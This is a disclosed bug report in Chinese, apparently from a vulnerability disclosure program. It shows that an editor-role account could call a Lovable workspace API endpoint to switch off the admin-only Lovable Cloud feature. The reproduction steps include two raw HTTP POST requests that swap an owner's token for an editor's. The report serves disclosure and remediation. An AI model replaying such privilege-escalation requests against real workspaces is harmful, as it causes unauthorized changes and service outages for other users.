报告 #3371414 - 权限验证不当导致编辑器可切换管理员专属工作区功能（Lovable云）

时间线

• d0maxploit 向 Lovable VDP 提交报告
• 2025年10月5日 下午1:08 UTC

摘要 具有编辑器角色的账户可成功调用API端点 /workspaces/<WORKSPACE_ID>/tool-preferences/supabase/enable 来禁用工作区范围的管理员专属功能（Lovable云）。该API未对此操作实施服务端角色检查，导致垂直权限提升（访问控制失效）。

复现步骤

前提条件：

• 两个账户同属 Victim-Workspace 工作区：
  • 账户A（所有者/管理员）- 在 Victim-Workspace 中具有所有者角色
  • 账户B（编辑器）- 在同一 Victim-Workspace 中具有编辑器角色

1. 以账户A（管理员）身份登录，并在工作区内关闭云功能
2. 捕获负责禁用云功能的端点：

1
2
3
4
5
6

POST /workspaces/<WORKSPACE_ID>/tool-preferences/supabase/enable HTTP/2
Host: lovable-api.com
Authorization: Bearer <OWNER-JWT>
Content-Type: application/json

{"approval_preference":"disable"}

3. 修改请求使用编辑器JWT令牌 将Authorization头替换为账户B（编辑器）的JWT：

1
2
3
4
5
6

POST /workspaces/<WORKSPACE_ID>/tool-preferences/supabase/enable HTTP/2
Host: lovable-api.com
Authorization: Bearer <EDITOR_JWT>
Content-Type: application/json

{"approval_preference":"disable"}

当使用编辑器的JWT重新发送请求时，请求成功且Lovable云设置在工作区中被关闭。

概念验证 视频：Lovable_Cloud_Feature_POC.mp4（8.37 MB）

影响 编辑器可禁用Lovable云功能，该功能为工作区后端提供支持（包括数据库、认证、存储和无服务器功能）。这可能导致工作区范围的服务中断和所有项目及用户的功能损坏，由于潜在的服务中断和业务损害，影响程度为高级。

附件 1个附件：Lovable_Cloud_Feature_POC.mp4

处理记录

• attl_lovable（Lovable VDP员工）于2025年10月5日下午1:32 UTC将状态更改为"已分类"
• attl_lovable于2025年10月5日晚上7:47 UTC将严重性从高（8.3）更改为低
• attl_lovable于2025年10月5日晚上7:47 UTC关闭报告并将状态更改为"已解决"
• d0maxploit于2025年10月5日晚上8:32 UTC请求披露此报告
• 报告已于3天前披露

报告详情

• 报告时间：2025年10月5日下午1:08 UTC
• 报告者：d0maxploit
• 报告对象：Lovable VDP
• 报告ID：#3371414
• 状态：已解决
• 严重性：低（0.1 ~ 3.9）
• 披露时间：2025年11月4日晚上8:32 UTC
• 弱点：权限验证不当
• CVE ID：无
• 赏金：无